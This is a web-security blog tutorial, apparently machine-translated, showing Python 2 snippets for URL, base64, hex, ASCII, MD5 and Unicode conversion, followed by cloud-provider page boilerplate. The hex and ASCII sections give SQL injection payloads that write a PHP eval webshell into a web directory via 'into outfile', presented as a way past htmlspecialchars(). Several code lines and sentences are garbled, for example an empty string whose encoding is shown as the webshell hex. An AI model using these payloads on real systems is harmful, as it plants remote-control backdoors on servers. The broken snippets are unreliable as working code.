Preface
I remember that when I got started, the problem of self-processing encoding conversion was often "Baidu: url decoding, base64 encryption, hex ......", Or you can use a software called "xiaokui multi-function conversion tool" and then directly use the decoder function of Burpsuite. However, there are also some problems: low online conversion efficiency (2/3 of search time), there are some minor problems with the two tools, such as the Chinese characters involved in the burp are often garbled.
Url encoding is a format used by browsers to package form input. it is a most familiar encoding method for web users.
>>> from urllib import *>>> quote("union select null,null,null")'union%20select%20null%2Cnull%2Cnull'>>> unquote("union%20select%20null%2Cnull%2Cnull")'union select null,null,null'>>> urlencode({'x':'2333','y':'666'})'y=666&x=2333'
Base64
Base64 is often used as a parameter for webpage forms and HTTP transmission, and is also used for mail protocol transmission of user information.
>>> import base64>>> base64.b64encode("admin")'YWRtaW4='>>> base64.b64decode('YWRtaW4=')'admin'
I remember that base32 decryption was detected in the ctf competition. generally, online decryption is not provided for websites, and it seems that there is no way to continue. However, if you use python, it will be as simple as decrypting base64 above. you only need to change the function:
>>> import base64>>> base64.b32encode('jjjjj')'NJVGU2TK'>>> base64.b32decode('NJVGU2TK')'jjjjj'
Hex
Hexadecimal encoding is also a common encoding solution in web applications. As a web security engineer, we are aware that MySQL injection can be bypassed using hex.htmlspecialchars()Function to write data to webshell.
For example:
select 0x3c3f70687020406576616c28245f504f53545b615d293b203f3e into outfile '/web/1.php'
The following describes how to implement hex encryption and decryption in python:
>>> '
'.encode('hex')'3c3f70687020406576616c28245f504f53545b615d293b203f3e'>>>>>> print '3c3f70687020406576616c28245f504f53545b615d293b203f3e'.decode('hex')
>>>
ASCii
In MySQLchar()The function converts the ascii code. For this reason, you can use this feature to bypasshtmlspecialchars()Function.
For example:
select char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 97, 93, 41, 59, 32, 63, 62) into outfile '/web/1.php'
Using python to convert strings to ascii is very simple, but the reverse conversion requires a small operation:
>>> Map (ord ," ") [60, 63,112,104,112, 32,112,104,112,105,110,102,111, 40, 41, 32, 63, 62] >>> print chr (112) p >>> l = [60, 63,112,104,112, 32,112,104,112,105,110,102,111, 40, 41, 32, 63, 62] >>> print ''. join (map (chr, l) # thanks to the method pointed out by cousin pcat.
Md5
In the web security field, md5 can be said to be completely unknown. with its irreversible nature, most websites often use md5 encryption to store key data such as user passwords. Sometimes we need md5 encryption to submit payload, which can be easily implemented using the following method. Of course, commit 5 is recommended for decryption.
>>> from hashlib import md5>>> m = md5()>>> m.update('this is a secret')>>> m.hexdigest()'7dbbcee180ba4d456e4aa1cfbdad9c7b'>>> m.hexdigest()[8:-8]'80ba4d456e4aa1cf'>>>
Unicode to Chinese
Unicode conversion is common in many cases. Especially during penetration testing. If you use burp, Chinese characters may be garbled, which is very simple to implement in python.
>>> Print u "\ u4f60 \ u9700 \ u8981 \ u91cd \ u65b0 \ u767b \ u9646" you need to log on again
Summary
The above is a detailed explanation of the code conversion instance in python. For more information, see other related articles in the first PHP community!
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
